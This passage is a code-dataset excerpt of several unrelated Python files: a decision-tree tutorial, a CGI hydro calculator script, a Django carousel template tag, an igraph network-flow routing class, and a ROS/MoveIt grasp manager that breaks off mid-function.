#将符合条件的添加到返回的数据集\n\t\t\tretDataSet.append(reducedFeatVec)\n\tprint('retDataSet\\t', retDataSet)\n\treturn retDataSet #返回划分后的数据集\n\n\"\"\"\n函数说明:选择最优特征\n\nParameters:\n\tdataSet - 数据集\nReturns:\n\tbestFeature - 信息增益最大的(最优)特征的索引值\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-20\n\"\"\"\ndef chooseBestFeatureToSplit(dataSet):\n\tnumFeatures = len(dataSet[0]) - 1 #特征数量\n\tbaseEntropy = calcShannonEnt(dataSet) #计算数据集的香农熵\n\tbestInfoGain = 0.0 #信息增益\n\tbestFeature = -1 #最优特征的索引值\n\tfor i in range(numFeatures): #遍历所有特征\n\t\t#获取dataSet的第i个所有特征\n\t\tfeatList = [example[i] for example in dataSet]\n\t\tuniqueVals = set(featList) #创建set集合{},元素不可重复\n\t\tnewEntropy = 0.0 #经验条件熵\n\t\tfor value in uniqueVals: #计算信息增益\n\t\t\tsubDataSet = splitDataSet(dataSet, i, value) #subDataSet划分后的子集\n\t\t\tprob = len(subDataSet) / float(len(dataSet)) #计算子集的概率\n\t\t\tnewEntropy += prob * calcShannonEnt(subDataSet) #根据公式计算经验条件熵\n\t\tinfoGain = baseEntropy - newEntropy #信息增益\n\t\t# print(\"第%d个特征的增益为%.3f\" % (i, infoGain)) #打印每个特征的信息增益\n\t\tif (infoGain > bestInfoGain): #计算信息增益\n\t\t\tbestInfoGain = infoGain #更新信息增益,找到最大的信息增益\n\t\t\tbestFeature = i #记录信息增益最大的特征的索引值\n\treturn bestFeature #返回信息增益最大的特征的索引值\n\n\n\"\"\"\n函数说明:统计classList中出现此处最多的元素(类标签)\n\nParameters:\n\tclassList - 类标签列表\nReturns:\n\tsortedClassCount[0][0] - 出现此处最多的元素(类标签)\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-24\n\"\"\"\ndef majorityCnt(classList):\n\tclassCount = {}\n\tfor vote in classList: #统计classList中每个元素出现的次数\n\t\tif vote not in classCount.keys():classCount[vote] = 0 \n\t\tclassCount[vote] += 1\n\tsortedClassCount = sorted(classCount.items(), key = operator.itemgetter(1), reverse = True) #根据字典的值降序排序\n\treturn sortedClassCount[0][0] #返回classList中出现次数最多的元素\n\n\"\"\"\n函数说明:创建决策树\n\nParameters:\n\tdataSet - 训练数据集\n\tlabels - 分类属性标签\n\tfeatLabels - 存储选择的最优特征标签\nReturns:\n\tmyTree - 决策树\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-25\n\"\"\"\ndef createTree(dataSet, labels, featLabels):\n\tclassList = [example[-1] for example in dataSet]\n\tprint('classList\\t', classList ) #取分类标签(是否放贷:yes or no)\n\tif classList.count(classList[0]) == len(classList):\n\t\tprint(\"如果类别完全相同则停止继续划分\") #如果类别完全相同则停止继续划分\n\t\treturn classList[0]\n\tif len(dataSet[0]) == 1: \n\t\tprint(\"遍历完所有特征时返回出现次数最多的类标签\") #遍历完所有特征时返回出现次数最多的类标签\n\t\treturn majorityCnt(classList)\n\tbestFeat = chooseBestFeatureToSplit(dataSet) \n\tprint(\"bestFeat\\t\", bestFeat) #选择最优特征\n\tbestFeatLabel = labels[bestFeat]\n\tprint('bestFeatLabel\\t', bestFeatLabel) #最优特征的标签\n\tfeatLabels.append(bestFeatLabel)\n\tprint('featLabels\\t', featLabels)\n\tmyTree = {bestFeatLabel:{}} \n\tprint('myTree\\t', myTree) #根据最优特征的标签生成树\n\tdel(labels[bestFeat]) \n\tprint('labels\\t', labels) #删除已经使用特征标签\n\tfeatValues = [example[bestFeat] for example in dataSet]\n\tprint('featValues\\t', featValues) #得到训练集中所有最优特征的属性值\n\tuniqueVals = set(featValues)\n\tprint('uniqueVals\\t', uniqueVals) #去掉重复的属性值\n\tfor value in uniqueVals: #遍历特征,创建决策树。 \n\t\tmyTree[bestFeatLabel][value] = createTree(splitDataSet(dataSet, bestFeat, value), labels, featLabels)\n\treturn myTree\n\nif __name__ == '__main__':\n\tdataSet, labels = createDataSet()\n\tfeatLabels = []\n\tmyTree = createTree(dataSet, labels, featLabels)\n\tprint(myTree)","sub_path":"trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"50051824","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nimport cgi\r\nimport re\r\nimport LH_Maths_20170418_R09\r\nfrom LH_Maths_20170418_R09 import siteGUI\r\nfrom LH_Maths_20170418_R09 import process_here\r\n\r\n\r\ndef fetchHTTP_data():\r\n form = cgi.FieldStorage()\r\n siteGUI.GUI_LHtype = str('LH/LH Pro')\r\n if (form.getvalue('initial_data')): siteGUI.GUI_initial_data = int(form.getvalue('initial_data'))\r\n if (form.getvalue('process_option')): siteGUI.GUI_process_option = str(form.getvalue('process_option'))\r\n if (form.getvalue('meas_sys')): siteGUI.GUI_meas_sys = str(form.getvalue('meas_sys'))\r\n if (form.getvalue('avail_lps')): siteGUI.GUI_avail_lps = str(form.getvalue('avail_lps'))\r\n if (form.getvalue('pipe_head')): siteGUI.GUI_pipe_head = str(form.getvalue('pipe_head'))\r\n if (form.getvalue('pipe_len')): siteGUI.GUI_pipe_len = str(form.getvalue('pipe_len'))\r\n if (form.getvalue('PipeFlume')): siteGUI.GUI_PipeFlume = str(form.getvalue('PipeFlume'))\r\n if (form.getvalue('pipe_mat')): siteGUI.GUI_pipe_mat = str(form.getvalue('pipe_mat'))\r\n if (form.getvalue('pipe_dia')): siteGUI.GUI_pipe_dia = str(form.getvalue('pipe_dia'))\r\n if (form.getvalue('pipe_height')): siteGUI.GUI_pipe_height = str(form.getvalue('pipe_height'))\r\n if (form.getvalue('LH_head')): siteGUI.GUI_LH_head = str(form.getvalue('LH_head'))\r\n if (form.getvalue('Num_LH')): siteGUI.GUI_Num_LH = str(form.getvalue('Num_LH'))\r\n if (form.getvalue('LockNumLH')): siteGUI.GUI_LockNumLH = int(form.getvalue('LockNumLH'))\r\n if (form.getvalue('cable_eff_target')): siteGUI.GUI_cable_eff_target = str(form.getvalue('cable_eff_target'))\r\n if (form.getvalue('cable_len')): siteGUI.GUI_cable_len = str(form.getvalue('cable_len'))\r\n if (form.getvalue('Load_Vmax')): siteGUI.GUI_Load_Vmax = str(form.getvalue('Load_Vmax'))\r\n # else:siteGUI.GUI_Load_Vmax =str('150 V')\r\n if (form.getvalue('Load_Vmin')): siteGUI.GUI_Load_Vmin = str(form.getvalue('Load_Vmin'))\r\n if (form.getvalue('LockCable')): siteGUI.GUI_LockCable = int(form.getvalue('LockCable'))\r\n if (form.getvalue('cable_material')): siteGUI.GUI_cable_material = str(form.getvalue('cable_material'))\r\n if (form.getvalue('cable_size')): siteGUI.GUI_cable_size = str(form.getvalue('cable_size'))\r\n if (form.getvalue('cable_AWG')): siteGUI.GUI_cable_AWG = str(form.getvalue('cable_AWG'))\r\n\r\n\r\ndef putHTTP_data():\r\n response = \"{\"\r\n response += \"\\\"initial_data\\\" : \\\"\" + str(siteGUI.GUI_initial_data) + \"\\\", \"\r\n response += \"\\\"meas_sys\\\" : \\\"\" + str(siteGUI.GUI_meas_sys) + \"\\\", \"\r\n response += \"\\\"LHtype\\\" : \\\"\" + str(siteGUI.GUI_LHtype) + \"\\\", \"\r\n response += \"\\\"avail_lps\\\" : \\\"\" + str(siteGUI.GUI_avail_lps) + \"\\\", \"\r\n response += \"\\\"pipe_mat\\\" : \\\"\" + str(siteGUI.GUI_pipe_mat) + \"\\\", \"\r\n response += \"\\\"pipe_head\\\" : \\\"\" + str(siteGUI.GUI_pipe_head) + \"\\\", \"\r\n response += \"\\\"pipe_len\\\" : \\\"\" + str(siteGUI.GUI_pipe_len) + \"\\\", \"\r\n response += \"\\\"PipeFlume\\\" : \\\"\" + str(siteGUI.GUI_PipeFlume) + \"\\\", \"\r\n response += \"\\\"pipe_dia\\\" : \\\"\" + str(siteGUI.GUI_pipe_dia) + \"\\\", \"\r\n response += \"\\\"pipe_height\\\" : \\\"\" + str(siteGUI.GUI_pipe_height) + \"\\\", \"\r\n response += \"\\\"LH_head\\\" : \\\"\" + str(siteGUI.GUI_LH_head) + \"\\\", \"\r\n response += \"\\\"Num_LH\\\" : \\\"\" + str(siteGUI.GUI_Num_LH) + \"\\\", \"\r\n response += \"\\\"LockNumLH\\\" : \\\"\" + str(siteGUI.GUI_LockNumLH) + \"\\\", \"\r\n response += \"\\\"cable_eff_target\\\" : \\\"\" + str(siteGUI.GUI_cable_eff_target) + \"\\\", \"\r\n response += \"\\\"cable_len\\\" : \\\"\" + str(siteGUI.GUI_cable_len) + \"\\\", \"\r\n response += \"\\\"Load_Vmax\\\" : \\\"\" + str(siteGUI.GUI_Load_Vmax) + \"\\\", \"\r\n response += \"\\\"Load_Vmin\\\" : \\\"\" + str(siteGUI.GUI_Load_Vmin) + \"\\\", \"\r\n response += \"\\\"LockCable\\\" : \\\"\" + str(siteGUI.GUI_LockCable) + \"\\\", \"\r\n response += \"\\\"cable_material\\\" : \\\"\" + str(siteGUI.GUI_cable_material) + \"\\\", \"\r\n response += \"\\\"cable_size\\\" : \\\"\" + str(siteGUI.GUI_cable_size) + \"\\\", \"\r\n response += \"\\\"cable_AWG\\\" : \\\"\" + str(siteGUI.GUI_cable_AWG) + \"\\\", \"\r\n response += \"\\\"actual_lps\\\" : \\\"\" + str(siteGUI.GUI_actual_lps) + \"\\\", \"\r\n response += \"\\\"water_depth\\\" : \\\"\" + str(siteGUI.GUI_water_depth) + \"\\\", \"\r\n response += \"\\\"LH_Draft_T\\\" : \\\"\" + str(siteGUI.GUI_LH_Draft_T) + \"\\\", \"\r\n response += \"\\\"pipe_capacity\\\" : \\\"\" + str(siteGUI.GUI_pipe_capacity) + \"\\\", \"\r\n response += \"\\\"LH_rpm_Opr\\\" : \\\"\" + str(siteGUI.GUI_LH_rpm_Opr) + \"\\\", \"\r\n response += \"\\\"LH_rpm_NL\\\" : \\\"\" + str(siteGUI.GUI_LH_rpm_NL) + \"\\\", \"\r\n response += \"\\\"LH_watts_Opr\\\" : \\\"\" + str(siteGUI.GUI_LH_watts_Opr) + \"\\\", \"\r\n response += \"\\\"LH_pwr_tot\\\" : \\\"\" + str(siteGUI.GUI_LH_pwr_tot) + \"\\\", \"\r\n response += \"\\\"LH_V_Opr\\\" : \\\"\" + str(siteGUI.GUI_LH_V_Opr) + \"\\\", \"\r\n response += \"\\\"LH_V_NL\\\" : \\\"\" + str(siteGUI.GUI_LH_V_NL) + \"\\\", \"\r\n response += \"\\\"Aload_V\\\" : \\\"\" + str(siteGUI.GUI_Aload_V) + \"\\\", \"\r\n response += \"\\\"cable_mm_title\\\" : \\\"\" + str(siteGUI.GUI_cable_mm_title) + \"\\\", \"\r\n response += \"\\\"cable_AWG_title\\\" : \\\"\" + str(siteGUI.GUI_cable_AWG_title) + \"\\\", \"\r\n response += \"\\\"cable_dia_mm_sld\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_mm_sld) + \"\\\", \"\r\n response += \"\\\"cable_dia_mm_str\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_mm_str) + \"\\\", \"\r\n response += \"\\\"cable_dia_in_sld\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_in_sld) + \"\\\", \"\r\n response += \"\\\"cable_dia_in_str\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_in_str) + \"\\\", \"\r\n response += \"\\\"cable_A\\\" : \\\"\" + str(siteGUI.GUI_cable_A) + \"\\\", \"\r\n response += \"\\\"actual_cable_eff\\\" : \\\"\" + str(siteGUI.GUI_actual_cable_eff) + \"\\\", \"\r\n response += \"\\\"Load_pwr\\\" : \\\"\" + str(siteGUI.GUI_Load_pwr) + \"\\\", \"\r\n response += \"\\\"design_notes_hydro\\\" : \\\"\" + re.sub('\\s{2,}|\\r|\\n', ' ', siteGUI.GUI_design_notes_hydro) + \"\\\", \"\r\n response += \"\\\"design_notes_elec\\\" : \\\"\" + re.sub('\\s{2,}|\\r|\\n', ' ', siteGUI.GUI_design_notes_elec) + \"\\\", \"\r\n response += \"\\\"design_notes_safety\\\" : \\\"\" + re.sub('\\s{2,}|\\r|\\n', ' ', siteGUI.GUI_design_notes_safety) + \"\\\"\"\r\n response += \"}\"\r\n\r\n return response\r\n\r\n\r\nprint(\"Content-Type: text/plain\\n\")\r\nfetchHTTP_data()\r\nprocess_here()\r\nprint(putHTTP_data());\r\n","sub_path":"flaskCalculator_V3/LH_HTTP.py","file_name":"LH_HTTP.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"471506045","text":"from django import template\n\nimport six\n\nfrom ..models import Carousel\n\n\nregister = template.Library()\n\nDEFAULT_TEMPLATE_NAMES = ['carousel/templatetags/carousel.html']\n\n\ndef render_carousel(context, template_name):\n template_names = get_template_names(template_name=template_name)\n return template.loader.render_to_string(template_names, context)\n\n\ndef get_template_names(template_name):\n template_names = DEFAULT_TEMPLATE_NAMES\n if template_name:\n template_names.insert(0, template_name)\n return template_names\n\n\n@register.simple_tag(takes_context=True)\ndef carousel(context, carousel, template_name=None):\n if isinstance(carousel, six.string_types):\n return carousel_with_name(context, name=carousel, template_name=template_name)\n context['carousel'] = carousel\n return render_carousel(context, template_name)\n\n\n@register.simple_tag(takes_context=True)\ndef carousel_with_name(context, name, template_name=None):\n try:\n context['carousel'] = Carousel.objects.get(name=name)\n return render_carousel(context, template_name)\n except Carousel.DoesNotExist:\n return ''\n\n\n@register.simple_tag(takes_context=True)\ndef carousel_with_id(context, id, template_name=None):\n try:\n context['carousel'] = Carousel.objects.get(id=id)\n return render_carousel(context, template_name)\n except Carousel.DoesNotExist:\n return ''\n","sub_path":"carousel/templatetags/carousel_tags.py","file_name":"carousel_tags.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"303480338","text":"\"\"\"\nEncapsulating class for Network object.\nProvides graph-specific functionality to support routing.\n\"\"\"\n\nfrom datetime import timedelta\nfrom igraph import *\nimport itertools\nimport sys\n\nfrom graphviz import Digraph\nimport network\nfrom yen_k_shortest_paths import *\nfrom debug import dprint\nfrom exceptions import *\n\n\nMAX_INT = sys.maxsize\n\n\nNG_DEBUG = True\n\n\ndef ng_dprint(fmt, args=None):\n if NG_DEBUG:\n if args is not None:\n dprint(fmt % args)\n else:\n dprint(fmt)\n\n\nclass Path(object):\n \"\"\"\n A representation of a path in the graph and it properties.\n \"\"\"\n def __init__(self, G, edges, rank):\n \"\"\"\n build a path object given the list of edge objects in paths.\n the path belongs to the graph G.\n \"\"\"\n self.G = G\n self.rank = rank # this path's position in the context of the k-shortest paths it belongs to.\n self.edges = edges\n self.start = edges[0].source\n self.end = edges[-1].target\n self.packages = []\n\n def __str__(self):\n start_statid = self.G.vs[self.start][\"statid\"]\n end_statid = self.G.vs[self.end][\"statid\"]\n string = \"%d>>%d--(%d) ------------------------------------\\n\" % \\\n (start_statid, end_statid, self.rank, )\n for edge in self.edges:\n s_statid = self.G.vs[edge.source][\"statid\"]\n t_statid = self.G.vs[edge.target][\"statid\"]\n string += \" %d-->%d: \" % (s_statid, t_statid)\n string += \"SR: %s \" % edge[\"SR\"]\n string += \"flow: %d/%d \" % (edge[\"flow\"], edge[\"capacity\"])\n string += \"assigned: %d/%d \\n\" % (edge[\"assigned\"], edge[\"flow\"])\n\n string += \"total time: \" + str(self.latency()) + \"\\n\"\n string += \"--------------------------------------------\\n\"\n return string\n\n def edges(self):\n return self.edges\n\n def latency(self):\n \"\"\"\n Return the amount of time in minutes and seconds it would take to\n traverse the path.\n \"\"\"\n lat = 0.0\n for e in self.edges:\n lat += float(e[\"latency\"])\n\n return timedelta(seconds=lat)\n\n def use(self, pid):\n \"\"\"\n Assign package with package id pid to this path.\n If doing so will violate one of this path's edges, throw a PathFull exception\n and leave the path unchanged.\n \"\"\"\n for edge in self.edges:\n edge[\"assigned\"] += 1\n if edge[\"assigned\"] > edge[\"flow\"]:\n # clean up and raise PathFull exception.\n for e in self.edges:\n e[\"assigned\"] -= 1\n if e == edge:\n break\n raise PathFull\n\n # all is well if we got here\n self.packages.append(pid)\n\n def validate(self, s, t):\n \"\"\"\n confirm that this path actually goes from s to t\n \"\"\"\n if s != self.start or t != self.end:\n raise InconsistentPath(self)\n\n\nclass NetGraph(network.Network):\n def __init__(self, graphtype=\"network\"):\n self.G = Graph(directed=True)\n if graphtype == \"simple\":\n self.__build_simple()\n elif graphtype == \"network\":\n super(NetGraph, self).__init__()\n self.__build_network()\n\n def __build_simple(self):\n \"\"\"\n build a simple small graph for correctness testing.\n 1 -> 2 , cap = 3\n 1 -> 6 , cap = 3\n 2 -> 3 , cap = 3\n 2 -> 6 , cap = 2\n 3 -> 4 , cap = 2\n 3 -> 5 , cap = 4\n 5 -> 4 , cap = 3\n 6 -> 5 , cap = 2\n \"\"\"\n\n # vertices: 0-6\n for i in range(7):\n self.G.add_vertex(statid=i)\n\n self.G.add_edge(1, 2, statid=0, SR=\"sr0\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(1, 6, statid=2, SR=\"sr2\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(2, 3, statid=3, SR=\"sr3\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(2, 6, statid=4, SR=\"sr4\", latency=1, capacity=2, flow=0, assigned=0)\n self.G.add_edge(3, 4, statid=5, SR=\"sr5\", latency=1, capacity=2, flow=0, assigned=0)\n self.G.add_edge(3, 5, statid=6, SR=\"sr6\", latency=1, capacity=4, flow=0, assigned=0)\n self.G.add_edge(5, 4, statid=7, SR=\"sr7\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(6, 5, statid=8, SR=\"sr8\", latency=1, capacity=2, flow=0, assigned=0)\n\n def __build_network(self):\n \"\"\"\n Build a graph representation of this network.\n :rtype : Graph\n \"\"\"\n\n # Add vertices.\n # don't add stops that have no adjacent.\n stops = []\n for i, stop in enumerate(self.getStops()):\n o_stop = self.getStop(stop)\n if o_stop.has_adjacent():\n self.G.add_vertex(name=o_stop.stopid, statid=o_stop.intid)\n stops.append(o_stop)\n\n # Add edges.\n edgeid = 0\n for o_stop1 in stops:\n\n # Adjacency on trip.\n vert1 = self.vertex(statid=o_stop1.intid)\n for o_stop2, o_trip in o_stop1.adjacent(self):\n\n # check sanity. o_stop2 should have been added to graph.\n if NG_DEBUG and o_stop2 not in stops:\n ng_dprint(\"__build_network(): insanity!\")\n\n lat = o_trip.getLatency(o_stop1.stopid, o_stop2.stopid)\n if lat != float(\"inf\"):\n cap = o_trip.getCapacity()\n vert2 = self.vertex(statid=o_stop2.intid)\n self.G.add_edge(vert1,\n vert2,\n statid=edgeid,\n SR=o_trip.tripid,\n latency=lat,\n capacity=cap,\n flow=0,\n assigned=0)\n edgeid += 1\n\n def edge(self, statid):\n # Get edge by static id i.\n e = self.G.es.select(statid=statid)[0]\n if len(e) > 0:\n return e\n else:\n return\n\n def edges(self):\n \"\"\"\n Return a dict {statid: edge}\n \"\"\"\n e_dict = {}\n for e in self.G.es:\n e_dict[e[\"statid\"]] = e\n\n return e_dict\n\n def n_edges(self):\n return len(self.G.es)\n\n def vertex(self, nm=None, statid=None):\n if nm is not None:\n return self.G.vs.select(name=nm)[0]\n elif statid is not None:\n try:\n return self.G.vs.select(statid=statid)[0]\n except IndexError:\n for v in self.G.vs:\n dprint(v)\n\n def vertices(self):\n return (v for v in self.G.vs)\n\n def n_vertices(self):\n \"\"\"\n Return the number of vertices in this graph\n \"\"\"\n return len(self.G.vs)\n\n def max_flow(self, candidates):\n \"\"\"\n candidates is a list of tuples (source, sink) where source and sink are statids\n of vertices to use. Compute Multiple-source Multiple-sinks maximum flow for\n stops and sinks given. Update all edges with Flow info. Return the dict {statid: edge}\n as returned by self.edges()\n \"\"\"\n\n D_SRC = MAX_INT\n D_SNK = D_SRC - 1\n INF_CAPACITY = 10000 # cannot use MAX_INT, will overflow in the supporting c library.\n\n # add dummy vertex and edges connecting all sources and another\n # set for sinks.\n self.G.add_vertex(statid=D_SRC)\n self.G.add_vertex(statid=D_SNK)\n dummy_source = self.vertex(statid=D_SRC).index\n dummy_sink = self.vertex(statid=D_SNK).index\n\n # get vertex indices and remove duplicate requests\n s_indices = set()\n t_indices = set()\n for s_id, t_id in candidates:\n s_index = self.vertex(statid=s_id).index\n t_index = self.vertex(statid=t_id).index\n s_indices.add(s_index)\n t_indices.add(t_index)\n\n # # add dummy edges.\n for source, sink in itertools.zip_longest(s_indices, t_indices):\n self.G.add_edge(dummy_source, source, name=\"dummy_edge\", capacity=INF_CAPACITY)\n self.G.add_edge(sink, dummy_sink, name=\"dummy_edge\", capacity=INF_CAPACITY)\n\n # get max flow between dummy vertices.\n mf = self.G.maxflow(dummy_source, dummy_sink, capacity=\"capacity\")\n\n # update edges results.\n for edge in self.G.es:\n edge[\"flow\"] = mf.flow[edge.index]\n\n # done with dummies. remove them.\n # NB: This call deletes the dummy edges too.\n self.G.delete_vertices([dummy_source, dummy_sink])\n return mf.value\n\n def view(self, filename=\"diagrams/flow.gv\", label=\"flow\"):\n \"\"\"\n view graph with flow/capacity on each edge.\n \"\"\"\n dg = Digraph()\n for v in self.vertices():\n v_statid = v[\"statid\"]\n dg.node(str(v_statid))\n for e in self.G.es:\n if label == \"edgid\":\n label = \"%d\" % (e[\"statid\"])\n else:\n label = \"%d/%d\" % (e[\"flow\"], e[\"capacity\"])\n\n s_statid = self.G.vs[e.source][\"statid\"]\n t_statid = self.G.vs[e.target][\"statid\"]\n dg.edge(str(s_statid), str(t_statid), xlabel=label)\n\n dg.render(filename=filename, view=False)\n\n def k_shortest_paths(self, s_statid, t_statid, k):\n \"\"\"\n Return a list of k shortest Path objects from source to target.\n Shortest is defined in terms of latency.\n \"\"\"\n\n # get indices.\n s_index = self.vertex(statid=s_statid).index\n t_index = self.vertex(statid=t_statid).index\n paths, costs = yen_k_shortest_paths(self.G, s_index, t_index, k, \"latency\")\n l = []\n rank = 0\n for path, cost in itertools.zip_longest(paths, costs):\n # check sanity.\n\n edges = []\n for statid in path:\n edges.append(self.edge(statid))\n if len(edges) > 0:\n o_path = Path(self.G, edges, rank)\n # check sanity\n if NG_DEBUG:\n o_path.validate(s_index, t_index)\n\n l.append(o_path)\n rank += 1\n\n return l\n\n def __str__(self):\n \"\"\"\n Return a string representation of this graph.\n \"\"\"\n gs = GraphSummary(self.G,\n verbosity=1,\n edge_list_format='auto',\n print_edge_attributes=False)\n\n return str(gs)","sub_path":"netgraph.py","file_name":"netgraph.py","file_ext":"py","file_size_in_byte":10633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"521828711","text":"#!/usr/bin/env python\n\nimport rospy\nimport graspit_msgs.msg\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nimport block_recognition.msg\nimport typing\n\nimport sys\nimport moveit_commander\nimport actionlib\nimport graspit_moveit_controller\nimport world_manager\nimport tf\nimport tf_conversions.posemath as pm\n\n\nclass CRUIManager(object):\n\n def __init__(self):\n\n rospy.init_node('cruimanager')\n moveit_commander.roscpp_initialize(sys.argv)\n\n # Pull all params off param server\n self.analyze_grasp_topic = rospy.get_param(\"analyze_grasp_topic\")\n self.execute_grasp_topic = rospy.get_param(\"execute_grasp_topic\")\n self.run_recognition_topic = rospy.get_param(\"run_recognition_topic\")\n self.grasp_approach_tran_frame = rospy.get_param(\"grasp_approach_tran_frame\")\n self.world_frame = rospy.get_param(\"world_frame\")\n self.arm_move_group_name = rospy.get_param(\"arm_move_group_name\")\n self.gripper_move_group_name = rospy.get_param(\"gripper_move_group_name\")\n\n self.analyzer_planner_id = rospy.get_param(\"analyzer_planner_id\")\n self.executor_planner_id = rospy.get_param(\"executor_planner_id\")\n self.allowed_analyzing_time = rospy.get_param(\"allowed_analyzing_time\")\n self.allowed_execution_time = rospy.get_param(\"allowed_execution_time\")\n\n self.grasping_controller = graspit_moveit_controller.MoveitPickPlaceInterface(\n arm_name=self.arm_move_group_name,\n gripper_name=self.gripper_move_group_name,\n grasp_approach_tran_frame=self.grasp_approach_tran_frame,\n analyzer_planner_id=self.analyzer_planner_id,\n execution_planner_id=self.executor_planner_id,\n allowed_analyzing_time=self.allowed_analyzing_time,\n allowed_execution_time=self.allowed_execution_time\n )\n\n self.scene = moveit_commander.PlanningSceneInterface()\n self.block_recognition_client = block_recognition.BlockRecognitionClient()\n self.world_manager_client = world_manager.world_manager_client.WorldManagerClient()\n self.tf_listener = tf.TransformListener()\n\n # Start grasp analyzer action server\n self._analyze_grasp_as = actionlib.SimpleActionServer(self.analyze_grasp_topic,\n graspit_msgs.msg.CheckGraspReachabilityAction,\n execute_cb=self._analyze_grasp_reachability_cb,\n auto_start=False)\n self._analyze_grasp_as.start()\n\n # Start grasp execution action server\n self._execute_grasp_as = actionlib.SimpleActionServer(self.execute_grasp_topic,\n graspit_msgs.msg.GraspExecutionAction,\n execute_cb=self._execute_grasp_cb,\n auto_start=False)\n self._execute_grasp_as.start()\n\n # Start object recognition action server\n self._run_recognition_as = actionlib.SimpleActionServer(self.run_recognition_topic,\n graspit_msgs.msg.RunObjectRecognitionAction,\n execute_cb=self._run_recognition_cb,\n auto_start=False)\n self._run_recognition_as.start()\n\n rospy.loginfo(self.__class__.__name__ + \" is inited\")\n\n def _graspit_grasp_to_moveit_grasp(self, graspit_grasp):\n # type: (graspit_msgs.msg.Grasp) -> moveit_msgs.msg.Grasp\n\n pre_grasp_approach_direction = geometry_msgs.msg.Vector3Stamped()\n pre_grasp_approach_direction.header.frame_id = rospy.get_param(\"pre_grasp_approach_direction_frame_id\")\n pre_grasp_approach_direction.vector.x = rospy.get_param(\"pre_grasp_approach_direction_x\")\n pre_grasp_approach_direction.vector.y = rospy.get_param(\"pre_grasp_approach_direction_y\")\n pre_grasp_approach_direction.vector.z = rospy.get_param(\"pre_grasp_approach_direction_z\")\n\n post_grasp_retreat_direction = geometry_msgs.msg.Vector3Stamped()\n post_grasp_retreat_direction.header.frame_id = rospy.get_param(\"post_grasp_retreat_direction_frame_id\")\n post_grasp_retreat_direction.vector.x = rospy.get_param(\"post_grasp_retreat_direction_x\")\n post_grasp_retreat_direction.vector.y = rospy.get_param(\"post_grasp_retreat_direction_y\")\n post_grasp_retreat_direction.vector.z = rospy.get_param(\"post_grasp_retreat_direction_z\")\n\n moveit_grasp_msg = graspit_moveit_controller.graspit_grasp_to_moveit_grasp(\n graspit_grasp_msg=graspit_grasp,\n listener=self.tf_listener,\n grasp_tran_frame_name=self.grasp_approach_tran_frame,\n end_effector_link=self.grasping_controller.get_end_effector_link(),\n\n pre_grasp_goal_point_effort=rospy.get_param(\"pre_grasp_goal_point_effort\"),\n pre_grasp_goal_point_positions=rospy.get_param(\"pre_grasp_goal_point_positions\"),\n pre_grasp_goal_point_time_from_start_secs=rospy.get_param(\"pre_grasp_goal_point_time_from_start_secs\"),\n pre_grasp_joint_names=rospy.get_param(\"pre_grasp_joint_names\"),\n\n grasp_goal_point_effort=rospy.get_param(\"grasp_goal_point_effort\"),\n grasp_goal_point_positions=rospy.get_param(\"grasp_goal_point_positions\"),\n grasp_goal_point_time_from_start_secs=rospy.get_param(\"grasp_goal_point_time_from_start_secs\"),\n\n grasp_posture_joint_names=rospy.get_param(\"grasp_posture_joint_names\"),\n\n pre_grasp_approach_min_distance=rospy.get_param(\"pre_grasp_approach_min_distance\"),\n pre_grasp_approach_desired_distance=rospy.get_param(\"pre_grasp_approach_desired_distance\"),\n pre_grasp_approach_direction=pre_grasp_approach_direction,\n\n post_grasp_retreat_min_distance=rospy.get_param(\"post_grasp_retreat_min_distance\"),\n post_grasp_retreat_desired_distance=rospy.get_param(\"post_grasp_retreat_desired_distance\"),\n post_grasp_retreat_direction=post_grasp_retreat_direction,\n\n max_contact_force=rospy.get_param(\"max_contact_force\")\n )\n\n return moveit_grasp_msg\n\n def _analyze_grasp_reachability_cb(self, goal):\n # type: (graspit_msgs.msg.CheckGraspReachabilityGoal) -> graspit_msgs.msg.CheckGraspReachabilityResult\n \"\"\"\n @return: Whether the grasp is expected to succeed\n \"\"\"\n # Convert graspit grasp to moveit grasp\n rospy.loginfo(\"Analyzing grasp for object: {}\".format(goal.grasp.object_name))\n\n block_names = self.scene.get_attached_objects().keys()\n self.grasping_controller.detach_all_blocks(block_names)\n\n moveit_grasp_msg = self._graspit_grasp_to_moveit_grasp(goal.grasp)\n success, pick_result = self.grasping_controller.analyze_moveit_grasp(goal.grasp.object_name, moveit_grasp_msg)\n\n result = graspit_msgs.msg.CheckGraspReachabilityResult()\n result.isPossible = success\n result.grasp_id = goal.grasp.grasp_id\n\n rospy.loginfo(\"Able to execute grasp with grasp id {} after analysis: {}\".format(goal.grasp.grasp_id, success))\n self._analyze_grasp_as.set_succeeded(result)\n\n return []\n\n def _execute_grasp_cb(self, goal):\n # type: (graspit_msgs.msg.GraspExecutionGoal) -> graspit_msgs.msg.GraspExecutionResult\n rospy.loginfo(\"Executing grasp goal\")\n result = graspit_msgs.msg.GraspExecutionResult()\n result.success = False\n\n block_names = self.scene.get_attached_objects().keys()\n self.grasping_controller.detach_all_blocks(block_names)\n\n # Acquire block position for place\n objects = self.scene.get_object_poses([goal.grasp.object_name])\n if not goal.grasp.object_name in objects:\n rospy.logerr(\"Object {} not in planning scene. Execute grasp failed\".format(goal.grasp.object_name))\n self._execute_grasp_as.set_aborted(result)\n 